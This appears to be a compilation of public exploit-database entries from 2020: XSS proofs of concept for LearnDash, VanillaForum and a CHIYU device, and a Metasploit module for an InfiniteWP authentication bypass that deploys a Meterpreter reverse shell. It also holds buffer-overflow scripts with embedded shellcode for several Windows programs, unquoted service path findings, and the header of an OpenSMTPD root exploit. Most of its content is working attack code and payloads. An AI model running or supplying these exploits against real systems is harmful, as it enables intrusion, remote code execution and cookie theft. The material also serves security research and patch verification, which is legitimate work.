# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
# Date: 2020-01-14
# Vendor Homepage: https://www.learndash.com
# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 3.0.0 - 3.1.1
# CVE : CVE-2020-7108

1. Description

LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected.

2. Proof of Concept

Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload.

[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E

An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.

3. Timeline

Vulnerability reported to the LearnDash team – January 14, 2020
LearnDash version 3.1.2 containing the fix released – January 14, 2020

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ManualRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
'Description'    => %q{
        This module exploits an authentication bypass in the WordPress
        InfiniteWP Client plugin to log in as an administrator and execute
        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.

        The module will attempt to retrieve the original PLUGIN_FILE contents
        and restore them after payload execution. If VerifyContents is set,
        which is the default setting, the module will check to see if the
        restored contents match the original.

        Note that a valid administrator username is required for this module.

        WordPress >= 4.9 is currently not supported due to a breaking WordPress
        API change. Tested against 4.8.3.
      },
'Author'         => [
'WebARX', # Discovery
'wvu'     # Module
      ],
'References'     => [
        ['WPVDB', '10011'],
        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
      ],
'DisclosureDate' => '2020-01-14',
'License'        => MSF_LICENSE,
'Platform'       => 'php',
'Arch'           => ARCH_PHP,
'Privileged'     => false,
'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
'DefaultTarget'  => 0,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
    ))

    register_options([
      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
    ])

    register_advanced_options([
      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
    ])
  end

  def username
    datastore['USERNAME']
  end

  def plugin_file
    datastore['PLUGIN_FILE']
  end

  def plugin_uri
    normalize_uri(wordpress_url_plugins, plugin_file)
  end

  def check
    unless wordpress_and_online?
      return CheckCode::Unknown('Is the site online and running WordPress?')
    end

    unless (version = wordpress_version)
      return CheckCode::Unknown('Could not detect WordPress version')
    end

    if Gem::Version.new(version) >= Gem::Version.new('4.9')
      return CheckCode::Safe("WordPress #{version} is an unsupported target")
    end

    vprint_good("WordPress #{version} is a supported target")

    check_version_from_custom_file(
      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
      /^= ([\d.]+)/,
'1.9.4.5'
    )
  end

  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
  def auth_bypass
    json = {
'iwp_action' => %w[add_site readd_site].sample,
'params'     => {'username' => username}
    }.to_json

    res = send_request_cgi(
'method' => 'POST',
'uri'    => wordpress_url_backend,
'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
    )

    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
    end

    print_good("Successfully obtained cookie for #{username}")
    vprint_status("Cookie: #{cookie}")

    cookie
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    print_status("Bypassing auth for #{username} at #{full_uri}")
    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
      fail_with(Failure::NoAccess, "Could not log in as #{username}")
    end

    print_good("Successfully logged in as #{username}")
    write_and_exec_payload
  end

  def write_and_exec_payload
    print_status("Retrieving original contents of #{plugin_uri}")
    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents
      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
    end

    print_good("Successfully retrieved original contents of #{plugin_uri}")
    vprint_status('Contents:')
    print(contents)

    print_status("Overwriting #{plugin_uri} with payload")
    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
    end

    print_good("Successfully overwrote #{plugin_uri} with payload")

    print_status("Requesting payload at #{plugin_uri}")
    send_request_cgi({
'method' => 'GET',
'uri'    => plugin_uri
    }, 0)

    restore_contents(contents)
  end

  def restore_contents(og_contents)
    print_status("Restoring original contents of #{plugin_uri}")
    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
    end

    return unless datastore['VerifyContents']

    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents == og_contents
      fail_with(Failure::UnexpectedReply,
"Current contents of #{plugin_uri} DO NOT match original!")
    end

    print_good("Current contents of #{plugin_uri} match original!")
  end

end

# CVE-2020-8825
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8825

## Vendor:
    VanillaForum 

## Description:   
    It is possible to store xss payload in index.php?p=/dashboard/settings/branding. An attacker will store the xss payload on this section and when the user will visit the page then attacker will get all the sensitive information of the user.

## Environment:

    Version: 2.6.3
    OS: Windows 10, Linux
    PHP: 7
    URL: index.php?p=/dashboard/settings/branding

## Proof of Concept:
    https://github.com/hacky1997/CVE-2020-8825/blob/master/vanilla.png

## Assigned by:
  [Sayak Naskar](https://github.com/hacky1997/)

# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Author: boku
# Date: 2020-02-10
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe
# Version: Torrent iPod Video Converter Version 1.51 Build 115
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
#  1) Download, install, and open Torrent iPod Video Converter
#  2) run python script & open created 'poc.txt' file
#  3) select-all > copy-all
#  4) in app, click 'Register' on the bottom
#  5) in 'Name:' textbox enter 'a'
#  6) in 'Code:' textbox paste buffer
#  7) click 'OK', calculator will open & app will crash

# ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python
# x86/alpha_upper chosen with final size 447
# the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub.
#shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49"
# echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm -
#   89E7              mov di,sp
#   DADC              fcmovu st4
#   D977F4            fnstenv [bx-0xc]
#   5D                pop bp
#   55                push bp
#   59                pop cx
#   49                dec cx
shellcode  = b'\x54\x5f' # push esp # pop edi
shellcode += b'\x56\x59' # push esi # pop ecx
shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC
shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50"
shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39"
shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b"
shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c"
shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a"
shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43"
shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51"
shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c"
shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50"
shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44"
shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a"
shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58"
shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54"
shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b"
shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c"
shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56"
shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31"
shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51"
shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45"
shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f"
shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38"
shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37"
shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50"
shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52"
shellcode += b"\x4c\x52\x43\x33\x30\x41\x41"

EIP_OS   = '\x41'*(4136-len(shellcode))
EIP      = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe)
payload  = shellcode + EIP_OS + EIP

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")

Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeFTPd.exe
Version: 1.0.13
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
freeFTPdService                           C:\Program Files\freeSSHd\freeFTPdService.exe                                      Auto

C:\Users\nightelf>sc qc freeFTPdService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: freeFTPdService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\freeFTPdService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : freeFTPdService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksorter.com
Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe
Version: 12.4.16
Tested On: Windows 10 (32-bit)


C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """
Disk Sorter Enterprise                    C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe                            Auto

C:\Users\terran>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Sorter Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Exploit Title: Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksavvy.com
Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v12.3.18.exe
Version: 12.3.18
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "Disk Savvy" | findstr /i /v """
Disk Savvy Enterprise      C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe      Auto

C:\Users\nightelf>sc qc "Disk Savvy Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Savvy Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Savvy Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.syncbreeze.com
Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe
Version: 12.4.18
Tested On: Windows 10 (32-bit)

C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Sync Breeze Enterprise          C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe             Auto

C:\Users\elaglor>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sync Breeze Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sync Breeze Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com 
Software Link: http://www.freesshd.com/freeSSHd.exe
Version: 1.3.1
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """
FreeSSHDService                           C:\Program Files\freeSSHd\FreeSSHDService.exe                                      Auto

C:\Users\nightelf>sc qc FreeSSHDService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FreeSSHDService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\FreeSSHDService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FreeSSHDService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839

# 1. Description:
# In CHIYU BF430 web page,
# user can modify the system configuration by access the /if.cgi.
# Attackers can inject malicious XSS code in "TF_submask" field.
# The XSS code will be stored in the database, so that causes a stored XSS vulnerability.

# 2. Proof of Concept:
# Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter.
# Injecting the XSS code in parameter “TF_submask”:
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

==---------------------------------------------------------------
This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you.
---------------------------------------------------------------==!!

#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "key.txt".
#2. Just copy the text inside "key.txt".
#3. Start the program. In the new window click "Help"> "Register ...
#4. Now paste the content of "key.txt" into the field: "Registration Key"> Click "Ok"
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10014283)
#0x10014283 : pop ebx # pop ecx # ret 0x0c |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll] 
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("key.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"


#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help"> "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name"> Click "Ok"
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004bb51)
#0x1004bb51 : pop edi # pop esi # ret 0x0c |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
long_buffer = "\x44" * 600
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode + long_buffer
try:
    f=open("name.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

#Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help"> "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name"> Click "Ok"
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x100411fc)
#0x100411fc : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
long_buffer = "\x44" * 600
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode + long_buffer
try:
    f=open("name.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation
# Date: 2020-02-02
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.opensmtpd.org/
# Version: OpenSMTPD 6.4.0 - 6.6.1
# Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1
# CVE: CVE-2020-7247

#!/usr/bin/perl

#
# raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD
# Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and
# other products, allows remote attackers to execute arbitrary commands as root
# via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL
# FROM field. This affects the "uncommented" default configuration. The issue
# exists because of an incorrect return value upon failure of input validation
# (CVE-2020-7247).
#
# "Wow. I feel all butterflies in my tummy that bugs like this still exist. 
# That's awesome :)" -- skyper
#
# This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to
# root on OpenBSD in the default configuration, or execute remote commands as 
# root (only in OpenSMTPD "uncommented" default configuration).
#
# See also:
# https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
# https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/
# https://www.kb.cert.org/vuls/id/390745/
# https://www.opensmtpd.org/security.html
#
# Usage (LPE):
# phish$ uname -a
# OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64
# phish$ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel)
# phish$ ./raptor_opensmtpd.pl LPE
# [...]
# Payload sent, please wait 5 seconds...
# -rwsrwxrwx  1 root  wheel  12432 Feb  1 21:20 /usr/local/bin/pwned
# phish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Usage (RCE):
# raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org
# [...]
# Payload sent, please wait 5 seconds...
# /bin/sh: No controlling tty (open /dev/tty: Device not configured)
# /bin/sh: Can't find tty file descriptor
